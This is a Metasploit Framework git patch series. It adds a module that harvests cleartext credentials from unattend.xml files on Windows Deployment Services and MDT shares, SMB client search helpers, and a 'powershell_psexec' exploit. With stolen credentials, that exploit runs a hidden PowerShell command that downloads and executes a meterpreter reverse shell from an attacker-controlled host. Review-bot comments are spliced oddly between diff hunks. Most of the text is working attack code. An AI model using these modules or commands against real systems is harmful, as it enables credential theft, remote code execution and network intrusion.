From edc61a19863c995d916193571ec615b74a33538e Mon Sep 17 00:00:00 2001
From: Meatballs
Date: Thu, 31 Jan 2013 20:02:10 +0000
Subject: [PATCH 001/853] Repull
---
 .../windows_deployment_services_shares.rb | 236 ++++++++++++++++++
 1 file changed, 236 insertions(+)
 create mode 100644 modules/auxiliary/gather/windows_deployment_services_shares.rb
diff --git a/modules/auxiliary/gather/windows_deployment_services_shares.rb b/modules/auxiliary/gather/windows_deployment_services_shares.rb
new file mode 100644
index 0000000000..b4a5c4f48d
--- /dev/null
+++ b/modules/auxiliary/gather/windows_deployment_services_shares.rb
@@ -0,0 +1,236 @@ +# +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex/proto/dcerpc' +require 'rex/parser/unattend' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::SMB + include Msf::Exploit::Remote::SMB::Authenticated + include Msf::Exploit::Remote::DCERPC + + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Windows Deployment Services Unattend Gatherer', + 'Description' => %q{ + Used after discovering domain credentials with aux/scanner/dcerpc/windows_deployment_services + or if you already have domain credentials. Will attempt to connect to the RemInst share and any + Microsoft Deployment Toolkit shares (identified by comments), search for unattend files, and recover credentials. + }, + 'Author' => [ 'Ben Campbell ' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'MSDN', 'http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx'], + [ 'URL', 'http://rewtdance.blogspot.co.uk/2012/11/windows-deployment-services-clear-text.html'], + ], + )) + + register_options( + [ + Opt::RPORT(445), + OptString.new('SMBDomain', [ false, "SMB Domain", '']), + ], self.class) + + deregister_options('RHOST', 'CHOST', 'CPORT', 'SSL', 'SSLVersion') + end + + + def share_type(val) + stypes = [ + 'DISK', + 'PRINTER', + 'DEVICE', + 'IPC', + 'SPECIAL', + 'TEMPORARY' + ] + + if val > (stypes.length - 1) + return 'UNKNOWN' + end + + stypes[val] + end + + # Stolen from enumshares - Tried refactoring into simple client, but the two methods need to go in EXPLOIT::SMB and EXPLOIT::DCERPC + # and then the lanman method calls the RPC method. Suggestions where to refactor to welcomed! 
+ def srvsvc_netshareenum + simple.connect("IPC$") + handle = dcerpc_handle('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', 'ncacn_np', ["\\srvsvc"]) + begin + dcerpc_bind(handle) + rescue Rex::Proto::SMB::Exceptions::ErrorCode => e + print_error("#{rhost} : #{e.message}") + return + end + + stubdata = + NDR.uwstring("\\\\#{rhost}") + + NDR.long(1) #level + + ref_id = stubdata[0,4].unpack("V")[0] + ctr = [1, ref_id + 4 , 0, 0].pack("VVVV") + + stubdata << ctr + stubdata << NDR.align(ctr) + stubdata << ["FFFFFFFF"].pack("H*") + stubdata << [ref_id + 8, 0].pack("VV") + response = dcerpc.call(0x0f, stubdata) + res = response.dup + win_error = res.slice!(-4, 4).unpack("V")[0] + if win_error != 0 + raise "DCE/RPC error : Win_error = #{win_error + 0}" + end + #remove some uneeded data + res.slice!(0,12) # level, CTR header, Reference ID of CTR + share_count = res.slice!(0, 4).unpack("V")[0] + res.slice!(0,4) # Reference ID of CTR1 + share_max_count = res.slice!(0, 4).unpack("V")[0] + + raise "Dce/RPC error : Unknow situation encountered count != count max (#{share_count}/#{share_max_count})" if share_max_count != share_count + + types = res.slice!(0, share_count * 12).scan(/.{12}/n).map{|a| a[4,2].unpack("v")[0]} # RerenceID / Type / ReferenceID of Comment + + share_count.times do |t| + length, offset, max_length = res.slice!(0, 12).unpack("VVV") + raise "Dce/RPC error : Unknow situation encountered offset != 0 (#{offset})" if offset != 0 + raise "Dce/RPC error : Unknow situation encountered length !=max_length (#{length}/#{max_length})" if length != max_length + name = res.slice!(0, 2 * length).gsub('\x00','') + res.slice!(0,2) if length % 2 == 1 # pad + + comment_length, comment_offset, comment_max_length = res.slice!(0, 12).unpack("VVV") + raise "Dce/RPC error : Unknow situation encountered comment_offset != 0 (#{comment_offset})" if comment_offset != 0 + if comment_length != comment_max_length + raise "Dce/RPC error : Unknow situation encountered comment_length != 
comment_max_length (#{comment_length}/#{comment_max_length})" + end + comment = res.slice!(0, 2 * comment_length).gsub('\x00','') + res.slice!(0,2) if comment_length % 2 == 1 # pad + + @shares << [ name, share_type(types[t]), comment] + end + end + + def run_host(ip) + + @shares = [] + deploy_shares = [] + + begin + connect + smb_login + srvsvc_netshareenum + + @shares.each do |share| + # I hate unicode, couldn't find any other way to get these to compare! + # look at iconv for 1.8/1.9 compatability? + if (share[0].unpack('H*') == "REMINST\x00".encode('utf-16LE').unpack('H*')) || + (share[2].unpack('H*') == "MDT Deployment Share\x00".encode('utf-16LE').unpack('H*')) + + print_status("#{ip}:#{rport} #{share[0]} - #{share[1]} - #{share[2]}") + deploy_shares << share[0] + end + end + + deploy_shares.each do |deploy_share| + query_share(ip, deploy_share) + end + + rescue ::Interrupt + raise $! + end + end + + def query_share(rhost, deploy_share) + share_path = "\\\\#{rhost}\\#{deploy_share}" + print_status("Enumerating #{share_path}") + table = Rex::Ui::Text::Table.new({ + 'Header' => share_path, + 'Indent' => 1, + 'Columns' => ['Path', 'Type', 'Domain', 'Username', 'Password'] + }) + + creds_found = false + + # ruby 1.8 compat? + share = deploy_share.force_encoding('utf-16LE').encode('ASCII-8BIT').strip + + begin + simple.connect(share) + rescue ::Exception => e + print_error("#{share_path} - #{e}") + return + end + + results = simple.client.file_search("\\", /unattend.xml$/i, 10) + + results.each do |file_path| + file = simple.open(file_path, 'o').read() + + unless file.nil? + loot_unattend(file) + + creds = parse_client_unattend(file) + creds.each do |cred| + unless cred.empty? + unless cred['username'].nil? || cred['password'].nil? 
+ print_good("Retrived #{cred['type']} credentials from #{file_path}") + creds_found = true + domain = "" + domain = cred['domain'] if cred['domain'] + report_creds(domain, cred['username'], cred['password']) + table << [file_path, cred['type'], domain, cred['username'], cred['password']] + end + end + end + end + end + + if creds_found + print_line + table.print + print_line + else + print_error("No Unattend files found.") + end + end + + def parse_client_unattend(data) + begin + xml = REXML::Document.new(data) + + rescue REXML::ParseException => e + print_error("Invalid XML format") + vprint_line(e.message) + end + + return Rex::Parser::Unattend.parse(xml).flatten + end + + def loot_unattend(data) + return if data.empty? + p = store_loot('windows.unattend.raw', 'text/plain', rhost, data, "Windows Deployment Services") + print_status("Raw version saved as: #{p}") + end + + def report_creds(domain, user, pass) + report_auth_info( + :host => rhost, + :port => 445, + :sname => 'smb', + :proto => 'tcp', + :source_id => nil, + :source_type => "aux", + :user => "#{domain}\\#{user}", + :pass => pass) + end +end From 1e60817ec9d4a32285ad2c44c8d70d7a65e3c5d4 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Thu, 31 Jan 2013 20:07:48 +0000 Subject: [PATCH 002/853] Remember the SMB Changes --- lib/rex/proto/smb/client.rb | 39 ++++++++++++++++++++++++++++++++-- lib/rex/proto/smb/constants.rb | 19 ++++++++++++++++- 2 files changed, 55 insertions(+), 3 deletions(-) diff --git a/lib/rex/proto/smb/client.rb b/lib/rex/proto/smb/client.rb index bec1ff50d5..b16d4c666b 100644 --- a/lib/rex/proto/smb/client.rb +++ b/lib/rex/proto/smb/client.rb @@ -1046,7 +1046,6 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils pkt = CONST::SMB_TREE_CONN_PKT.make_struct self.smb_defaults(pkt['Payload']['SMB']) - pkt['Payload']['SMB'].v['TreeID'] = 0 pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TREE_CONNECT_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x18 
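Review bot: In `parse_client_unattend`, the `REXML::ParseException` rescue only logs and then falls through to `Rex::Parser::Unattend.parse(xml)` with `xml` still nil, so a single malformed unattend file on a share is likely to abort the run for that host (assuming the parser dereferences its argument, which this hunk does not show). Leave the method from the rescue branch instead, e.g. add `return []` after `vprint_line(e.message)`. Separately, both `.gsub('\x00','')` calls in `srvsvc_netshareenum` use single quotes, so the pattern is the literal four characters `\x00` rather than a NUL byte and nothing is stripped; that appears to be why `run_host` has to fall back to the UTF-16LE hex comparison. In `query_share`, `rescue ::Exception => e` also catches `Interrupt`, which `run_host` explicitly tries to re-raise; `rescue ::StandardError => e` would keep Ctrl-C working.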
@@ -1899,7 +1898,7 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils resp = find_next(last_search_id, last_offset, last_filename) search_next = 1 # Flip bit so response params will parse correctly end - end until eos != 0 or last_offset == 0 + end until eos != 0 or last_offset == 0 rescue ::Exception raise $! end @@ -1921,6 +1920,42 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils return resp # Returns the FIND_NEXT2 response packet for parsing by the find_first function end + # Recursively search through directories, to a max depth, searching for filenames + # that matches regex and returns path to matching files. + def file_search(current_path, regex, depth) + depth -= 1 + if depth < 0 + return + end + + results = find_first("#{current_path}*") + files = [] + + results.each do |result| + if result[0] =~ /^(\.){1,2}$/ # Ignore . .. + next + end + + if result[1]['attr'] & CONST::SMB_EXT_FILE_ATTR_DIRECTORY > 0 + search_path = "#{current_path}#{result[0]}\\" + begin + files << file_search(search_path, regex, depth).flatten.compact + rescue Rex::Proto::SMB::Exceptions::ErrorCode => e + # Ignore permission errors + unless e.get_error(e.error_code) == 'STATUS_ACCESS_DENIED' + raise e + end + end + else + if result[0] =~ regex + files << "#{current_path}#{result[0]}" + end + end + end + + return files.flatten.compact + end + # Creates a new directory on the mounted tree def create_directory(name) files = { } diff --git a/lib/rex/proto/smb/constants.rb b/lib/rex/proto/smb/constants.rb index e03085830a..d16a564a41 100644 --- a/lib/rex/proto/smb/constants.rb +++ b/lib/rex/proto/smb/constants.rb 
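Review bot: `file_search` returns nil rather than an array once `depth` drops below zero (the bare `return`), but the recursive call site immediately chains `file_search(search_path, regex, depth).flatten.compact`, so a directory tree deeper than the limit raises NoMethodError instead of stopping quietly; only `Rex::Proto::SMB::Exceptions::ErrorCode` is rescued there. Make the guard `return [] if depth < 0`. The dot-entry test `/^(\.){1,2}$/` is line-anchored; `/\A\.{1,2}\z/` states the intent exactly. The header comment should also say that `current_path` must end in a backslash and that the return value is a flat array of path strings.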
@@ -261,11 +261,28 @@ FILE_FILE_COMPRESSION = 0x00000008 FILE_VOLUME_QUOTAS = 0x00000010 FILE_VOLUME_IS_COMPRESSED = 0x00008000 +# SMB_EXT_FILE_ATTR +# http://msdn.microsoft.com/en-us/library/ee878573(prot.20).aspx +MB_EXT_FILE_ATTR_READONLY = 0x00000001 +SMB_EXT_FILE_ATTR_HIDDEN = 0x00000002 +SMB_EXT_FILE_ATTR_SYSTEM = 0x00000004 +SMB_EXT_FILE_ATTR_DIRECTORY = 0x00000010 +SMB_EXT_FILE_ATTR_ARCHIVE = 0x00000020 +SMB_EXT_FILE_ATTR_NORMAL = 0x00000080 +SMB_EXT_FILE_ATTR_TEMPORARY = 0x00000100 +SMB_EXT_FILE_ATTR_COMPRESSED = 0x00000800 +SMB_EXT_FILE_POSIX_SEMANTICS = 0x01000000 +SMB_EXT_FILE_BACKUP_SEMANTICS = 0x02000000 +SMB_EXT_FILE_DELETE_ON_CLOSE = 0x04000000 +SMB_EXT_FILE_SEQUENTIAL_SCAN = 0x08000000 +SMB_EXT_FILE_RANDOM_ACCESS = 0x10000000 +SMB_EXT_FILE_NO_BUFFERING = 0x20000000 +SMB_EXT_FILE_WRITE_THROUGH = 0x80000000 # SMB Error Codes SMB_STATUS_SUCCESS = 0x00000000 SMB_ERROR_BUFFER_OVERFLOW = 0x80000005 -SMB_STATUS_MORE_PROCESSING_REQUIRED = 0xC0000016 +SMB_STATUS_MORE_PROCESSING_REQUIRED = 0xC0000016 SMB_STATUS_ACCESS_DENIED = 0xC0000022 SMB_STATUS_LOGON_FAILURE = 0xC000006D From 739204b86d33f90141f9ffc4530d206dcca0bc98 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Thu, 31 Jan 2013 20:17:25 +0000 Subject: [PATCH 003/853] Build upon A.Maloteaux's SMB fixes --- lib/rex/proto/smb/client.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/rex/proto/smb/client.rb b/lib/rex/proto/smb/client.rb index b16d4c666b..42267652aa 100644 --- a/lib/rex/proto/smb/client.rb +++ b/lib/rex/proto/smb/client.rb @@ -1046,6 +1046,7 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils pkt = CONST::SMB_TREE_CONN_PKT.make_struct self.smb_defaults(pkt['Payload']['SMB']) + pkt['Payload']['SMB'].v['TreeID'] = 0 pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TREE_CONNECT_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x18 From f402e00a15c55ce67edd6e72640c1ea372329b26 Mon Sep 17 00:00:00 2001 
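Review bot: The first added constant is spelled `MB_EXT_FILE_ATTR_READONLY`, missing the leading `S` that every other entry in the block carries, so any later reference to `SMB_EXT_FILE_ATTR_READONLY` would raise NameError. It should read `SMB_EXT_FILE_ATTR_READONLY = 0x00000001`. Nothing visible in this series references the read-only bit yet (`file_search` only uses `SMB_EXT_FILE_ATTR_DIRECTORY`), so the mistake would surface only on first use.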
From: jakxx
Date: Fri, 19 Jul 2013 10:04:49 -0400
Subject: [PATCH 004/853] Added powershell psexec module
---
 .../windows/powershell/powershell_psexec.rb | 159 ++++++++++++++++++
 1 file changed, 159 insertions(+)
 create mode 100644 modules/exploits/windows/powershell/powershell_psexec.rb
diff --git a/modules/exploits/windows/powershell/powershell_psexec.rb b/modules/exploits/windows/powershell/powershell_psexec.rb
new file mode 100644
index 0000000000..669b4505ed
--- /dev/null
+++ b/modules/exploits/windows/powershell/powershell_psexec.rb
@@ -0,0 +1,159 @@ +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ManualRanking + + include Msf::Exploit::Remote::DCERPC + include Msf::Exploit::Remote::SMB::Psexec + include Msf::Exploit::Remote::SMB::Authenticated + include Msf::Exploit::EXE + include Msf::Exploit::Remote::HttpServer + + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Authenticated User Powershell PSEXEC', + 'Description' => %q{ + This module uses a valid windows user account to pull a meterpreter payload via psexec (thanks to hdm and r3dy) and powershell. It then + executes it within a powershell process. This module uses a slightly modified technique that was first detailed by + @obscuresec using Powersploit. A custom payload option is avaliable via the LPATH variable. + }, + 'Author' => + [ + 'Andrew Smith "jakx" ', + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 15627 $', + 'Privileged' => true, + 'DefaultOptions' => + { + 'WfsDelay' => 15, + 'EXITFUNC' => 'process', + 'Payload' => 'windows/meterpreter/reverse_tcp' + }, + 'References' => + [ + [ 'URL', 'http://obscuresecurity.blogspot.com/2013/03/powersploit-metasploit-shells.html' ], + [ 'URL', 'https://github.com/mattifestation/PowerSploit' ] + ], + 'Payload' => + { + 'Space' => 2048, + 'DisableNops' => true, + 'StackAdjustment' => -3500 + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0, + )) + + register_options( + [ + OptString.new('SHARE', [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) 
or a normal read/write folder share", 'ADMIN$' ]), + OptString.new('LHOST', [ true, "Host serving meterpreter payload", '' ]), + OptString.new('ARCH', [ true, "Architecture of target host (x64 or x86)", 'x64' ]), + OptString.new('LPATH', [ false, "Set this variable to the path of a local file if you want to specify a custom payload, such as powersploit", "" ]) + ], self.class ) + + end + + def peer + + return "#{rhost}:#{rport}" + + end + + def exploit + start_service( + {'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => resource_uri + }}) + + + print_status("Connecting to the server...") + connect() + + #Authenticate to target machine + print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...") + smb_login() + + if (not simple.client.auth_user) + print_line(" ") + print_error( + "FAILED! The remote host has only provided us with Guest privileges. " + + "Please make sure that the correct username and password have been provided. " + + "Windows XP systems that are not part of a domain will only provide Guest privileges " + + "to network logins by default." 
+ ) + print_line(" ") + disconnect + return + end + + resource=get_resource[1..-1] + payload="#{resource}" + + #Determine if LPATH or MSF payload needs to be used + if (datastore['LPATH'] == "") + print_status("No custom payload specified, using metasploit payload") + elsif File.exists?("#{datastore['LPATH']}") + print_status("Good, your custom payload exists, using #{datastore['LPATH']}") + else + print_error("Specified file #{datastore['LPATH']} does not exist...exiting...") + return + end + + #Define x64 and x32 specific commands + print_status("Pulling payload from #{datastore['LHOST']} and executing..") + + cmd="cmd.exe /c powershell.exe start-process powershell.exe -Argument '-windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted " << + "-command \"iex ((new-object net.webclient).DownloadString(''http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/#{payload}''))\"'" + + cmd64="cmd.exe /c powershell.exe start-process \"$env:WINDIR\\syswow64\\windowspowershell\\v1.0\\powershell.exe\" " << + "-Argument '-windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted " << + "-command \"iex ((new-object net.webclient).DownloadString(''http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/#{payload}''))\"'" + + begin + if (datastore['ARCH'] == "x86") + result=psexec(cmd) + elsif (datastore['ARCH'] == "x64") + result2=psexec(cmd64) + else + print_error("You did not specify a valid target machine architecture!") + return + end + + if (result) + print_status("x86 architecture command sent. Waiting for session...") + end + if (result2) + print_status("x64 architecture command sent. 
Waiting for session...") + end + rescue Rex::Proto::SMB::Exceptions::Error => exec_error + print_error("#{peer} - Unable to execute command: #{exec_error}") + return + end + + #Give time for payload to execute + select(nil, nil, nil, 25) + + handler + disconnect + end + + def on_request_uri(cli, request) + print_status("handling request for #{request.uri}") + if (datastore['LPATH'] != "") + script = File.read("#{datastore['LPATH']}") + else + script = Msf::Util::EXE.to_win32pe_psh(framework,payload.encoded) + end + send_response(cli, script, { 'Content-Type' => 'text/plain' }) + end +end From ba45e4e60cfadc434175f3ae694d3f33e77100f2 Mon Sep 17 00:00:00 2001 From: jakxx Date: Fri, 19 Jul 2013 11:09:48 -0400 Subject: [PATCH 005/853] Removed Revision --- modules/exploits/windows/powershell/powershell_psexec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/powershell/powershell_psexec.rb b/modules/exploits/windows/powershell/powershell_psexec.rb index 669b4505ed..04e378296b 100644 --- a/modules/exploits/windows/powershell/powershell_psexec.rb +++ b/modules/exploits/windows/powershell/powershell_psexec.rb @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Andrew Smith "jakx" ', ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: 15627 $', + 'Version' => '$$', 'Privileged' => true, 'DefaultOptions' => { From 6b64819ddce991b90617e3843dd9bbd6c66b3c4c Mon Sep 17 00:00:00 2001 From: jakxx Date: Thu, 25 Jul 2013 16:50:21 -0400 Subject: [PATCH 006/853] Updated Description --- modules/exploits/windows/powershell/powershell_psexec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/powershell/powershell_psexec.rb b/modules/exploits/windows/powershell/powershell_psexec.rb index 04e378296b..6f13facd90 100644 --- a/modules/exploits/windows/powershell/powershell_psexec.rb +++ b/modules/exploits/windows/powershell/powershell_psexec.rb 
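Review bot: In `exploit`, the `LPATH` existence check and the `ARCH` check run only after `start_service`, `connect` and `smb_login`, and their failure branches (like the `rescue` branch) `return` without calling `disconnect`, so a mistyped option still authenticates to the remote host and leaves the SMB session open. Check both options at the top of `exploit` before any network activity, and declare the option as `OptEnum.new('ARCH', [ true, "Architecture of target host (x64 or x86)", 'x64', ['x86', 'x64'] ])` so an invalid value is rejected when it is set. `File.exists?` is a deprecated alias; `File.exist?` is the supported spelling. The file also lacks the framework license header comment that the other new module in this series starts with.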
@@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote [ OptString.new('SHARE', [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ]), OptString.new('LHOST', [ true, "Host serving meterpreter payload", '' ]), - OptString.new('ARCH', [ true, "Architecture of target host (x64 or x86)", 'x64' ]), + OptString.new('ARCH', [ true, "Architecture of target host (x64 or x86). This options forces 32-bit powershell if machine is 64-bit", 'x64' ]), OptString.new('LPATH', [ false, "Set this variable to the path of a local file if you want to specify a custom payload, such as powersploit", "" ]) ], self.class ) From 785c2eeb95b0f906d50c1f95296dacf9a403d3ec Mon Sep 17 00:00:00 2001 From: Tab Assassin Date: Thu, 5 Sep 2013 16:20:04 -0500 Subject: [PATCH 007/853] Retab changes for PR #1421 --- lib/rex/proto/smb/client.rb | 492 +++++++++--------- .../windows_deployment_services_shares.rb | 368 ++++++------- 2 files changed, 430 insertions(+), 430 deletions(-) diff --git a/lib/rex/proto/smb/client.rb b/lib/rex/proto/smb/client.rb index a4221f0c84..fc50c54c85 100644 --- a/lib/rex/proto/smb/client.rb +++ b/lib/rex/proto/smb/client.rb 
@@ -1673,296 +1673,296 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils # Perform a nttransaction request using the specified subcommand, parameters, and data def nttrans_secondary(param = '', body = '', do_recv = true) - data = param + body + data = param + body - pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct - self.smb_defaults(pkt['Payload']['SMB']) + pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct + self.smb_defaults(pkt['Payload']['SMB']) - base_offset = pkt.to_s.length - 4 - param_offset = base_offset - data_offset = param_offset + param.length + base_offset = pkt.to_s.length - 4 + param_offset = base_offset + data_offset = param_offset + param.length - pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY - pkt['Payload']['SMB'].v['Flags1'] = 0x18 - if self.require_signing - #ascii - pkt['Payload']['SMB'].v['Flags2'] = 0x2807 - else - #ascii - pkt['Payload']['SMB'].v['Flags2'] = 0x2801 - end + pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY + pkt['Payload']['SMB'].v['Flags1'] = 0x18 + if self.require_signing + #ascii + pkt['Payload']['SMB'].v['Flags2'] = 0x2807 + else + #ascii + pkt['Payload']['SMB'].v['Flags2'] = 0x2801 + end - pkt['Payload']['SMB'].v['WordCount'] = 18 + pkt['Payload']['SMB'].v['WordCount'] = 18 - pkt['Payload'].v['ParamCountTotal'] = param.length - pkt['Payload'].v['DataCountTotal'] = body.length - pkt['Payload'].v['ParamCount'] = param.length - pkt['Payload'].v['ParamOffset'] = param_offset - pkt['Payload'].v['DataCount'] = body.length - pkt['Payload'].v['DataOffset'] = data_offset + pkt['Payload'].v['ParamCountTotal'] = param.length + pkt['Payload'].v['DataCountTotal'] = body.length + pkt['Payload'].v['ParamCount'] = param.length + pkt['Payload'].v['ParamOffset'] = param_offset + pkt['Payload'].v['DataCount'] = body.length + pkt['Payload'].v['DataOffset'] = data_offset - pkt['Payload'].v['Payload'] = data + pkt['Payload'].v['Payload'] = data - ret = self.smb_send(pkt.to_s) - return ret if not 
do_recv + ret = self.smb_send(pkt.to_s) + return ret if not do_recv - ack = self.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY) - return ack - end + ack = self.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY) + return ack + end - def queryfs(level) - parm = [level].pack('v') + def queryfs(level) + parm = [level].pack('v') - begin - resp = trans2(CONST::TRANS2_QUERY_FS_INFO, parm, '') + begin + resp = trans2(CONST::TRANS2_QUERY_FS_INFO, parm, '') - pcnt = resp['Payload'].v['ParamCount'] - dcnt = resp['Payload'].v['DataCount'] - poff = resp['Payload'].v['ParamOffset'] - doff = resp['Payload'].v['DataOffset'] + pcnt = resp['Payload'].v['ParamCount'] + dcnt = resp['Payload'].v['DataCount'] + poff = resp['Payload'].v['ParamOffset'] + doff = resp['Payload'].v['DataOffset'] - # Get the raw packet bytes - resp_rpkt = resp.to_s + # Get the raw packet bytes + resp_rpkt = resp.to_s - # Remove the NetBIOS header - resp_rpkt.slice!(0, 4) + # Remove the NetBIOS header + resp_rpkt.slice!(0, 4) - resp_parm = resp_rpkt[poff, pcnt] - resp_data = resp_rpkt[doff, dcnt] - return resp_data + resp_parm = resp_rpkt[poff, pcnt] + resp_data = resp_rpkt[doff, dcnt] + return resp_data - rescue ::Exception - raise $! - end - end + rescue ::Exception + raise $! 
+ end + end - def symlink(src,dst) - parm = [513, 0x00000000].pack('vV') + src + "\x00" + def symlink(src,dst) + parm = [513, 0x00000000].pack('vV') + src + "\x00" - begin - resp = trans2(CONST::TRANS2_SET_PATH_INFO, parm, dst + "\x00") + begin + resp = trans2(CONST::TRANS2_SET_PATH_INFO, parm, dst + "\x00") - pcnt = resp['Payload'].v['ParamCount'] - dcnt = resp['Payload'].v['DataCount'] - poff = resp['Payload'].v['ParamOffset'] - doff = resp['Payload'].v['DataOffset'] + pcnt = resp['Payload'].v['ParamCount'] + dcnt = resp['Payload'].v['DataCount'] + poff = resp['Payload'].v['ParamOffset'] + doff = resp['Payload'].v['DataOffset'] - # Get the raw packet bytes - resp_rpkt = resp.to_s + # Get the raw packet bytes + resp_rpkt = resp.to_s - # Remove the NetBIOS header - resp_rpkt.slice!(0, 4) + # Remove the NetBIOS header + resp_rpkt.slice!(0, 4) - resp_parm = resp_rpkt[poff, pcnt] - resp_data = resp_rpkt[doff, dcnt] - return resp_data + resp_parm = resp_rpkt[poff, pcnt] + resp_data = resp_rpkt[doff, dcnt] + return resp_data - rescue ::Exception - raise $! - end - end + rescue ::Exception + raise $! 
+ end + end - # Obtains allocation information on the mounted tree - def queryfs_info_allocation - data = queryfs(CONST::SMB_INFO_ALLOCATION) - head = %w{fs_id sectors_per_unit unit_total units_available bytes_per_sector} - vals = data.unpack('VVVVv') - info = { } - head.each_index {|i| info[head[i]]=vals[i]} - return info - end + # Obtains allocation information on the mounted tree + def queryfs_info_allocation + data = queryfs(CONST::SMB_INFO_ALLOCATION) + head = %w{fs_id sectors_per_unit unit_total units_available bytes_per_sector} + vals = data.unpack('VVVVv') + info = { } + head.each_index {|i| info[head[i]]=vals[i]} + return info + end - # Obtains volume information on the mounted tree - def queryfs_info_volume - data = queryfs(CONST::SMB_INFO_VOLUME) - vals = data.unpack('VCA*') - return { - 'serial' => vals[0], - 'label' => vals[2][0,vals[1]].gsub("\x00", '') - } - end + # Obtains volume information on the mounted tree + def queryfs_info_volume + data = queryfs(CONST::SMB_INFO_VOLUME) + vals = data.unpack('VCA*') + return { + 'serial' => vals[0], + 'label' => vals[2][0,vals[1]].gsub("\x00", '') + } + end - # Obtains file system volume information on the mounted tree - def queryfs_fs_volume - data = queryfs(CONST::SMB_QUERY_FS_VOLUME_INFO) - vals = data.unpack('VVVVCCA*') - return { - 'create_time' => (vals[1] << 32) + vals[0], - 'serial' => vals[2], - 'label' => vals[6][0,vals[3]].gsub("\x00", '') - } - end + # Obtains file system volume information on the mounted tree + def queryfs_fs_volume + data = queryfs(CONST::SMB_QUERY_FS_VOLUME_INFO) + vals = data.unpack('VVVVCCA*') + return { + 'create_time' => (vals[1] << 32) + vals[0], + 'serial' => vals[2], + 'label' => vals[6][0,vals[3]].gsub("\x00", '') + } + end - # Obtains file system size information on the mounted tree - def queryfs_fs_size - data = queryfs(CONST::SMB_QUERY_FS_SIZE_INFO) - vals = data.unpack('VVVVVV') - return { - 'total_alloc_units' => (vals[1] << 32) + vals[0], - 'total_free_units' => 
(vals[3] << 32) + vals[2], - 'sectors_per_unit' => vals[4], - 'bytes_per_sector' => vals[5] - } - end + # Obtains file system size information on the mounted tree + def queryfs_fs_size + data = queryfs(CONST::SMB_QUERY_FS_SIZE_INFO) + vals = data.unpack('VVVVVV') + return { + 'total_alloc_units' => (vals[1] << 32) + vals[0], + 'total_free_units' => (vals[3] << 32) + vals[2], + 'sectors_per_unit' => vals[4], + 'bytes_per_sector' => vals[5] + } + end - # Obtains file system device information on the mounted tree - def queryfs_fs_device - data = queryfs(CONST::SMB_QUERY_FS_DEVICE_INFO) - vals = data.unpack('VV') - return { - 'device_type' => vals[0], - 'device_chars' => vals[1], - } - end + # Obtains file system device information on the mounted tree + def queryfs_fs_device + data = queryfs(CONST::SMB_QUERY_FS_DEVICE_INFO) + vals = data.unpack('VV') + return { + 'device_type' => vals[0], + 'device_chars' => vals[1], + } + end - # Obtains file system attribute information on the mounted tree - def queryfs_fs_attribute - data = queryfs(CONST::SMB_QUERY_FS_ATTRIBUTE_INFO) - vals = data.unpack('VVVA*') - return { - 'fs_attributes' => vals[0], - 'max_file_name' => vals[1], - 'fs_name' => vals[3][0, vals[2]].gsub("\x00", '') - } - end + # Obtains file system attribute information on the mounted tree + def queryfs_fs_attribute + data = queryfs(CONST::SMB_QUERY_FS_ATTRIBUTE_INFO) + vals = data.unpack('VVVA*') + return { + 'fs_attributes' => vals[0], + 'max_file_name' => vals[1], + 'fs_name' => vals[3][0, vals[2]].gsub("\x00", '') + } + end - # Enumerates a specific path on the mounted tree - def find_first(path) - files = { } - parm = [ - 26, # Search for ALL files - 20, # Maximum search count - 6, # Resume and Close on End of Search - 260, # Level of interest - 0, # Storage type is zero - ].pack('vvvvV') + path + "\x00" + # Enumerates a specific path on the mounted tree + def find_first(path) + files = { } + parm = [ + 26, # Search for ALL files + 20, # Maximum search count 
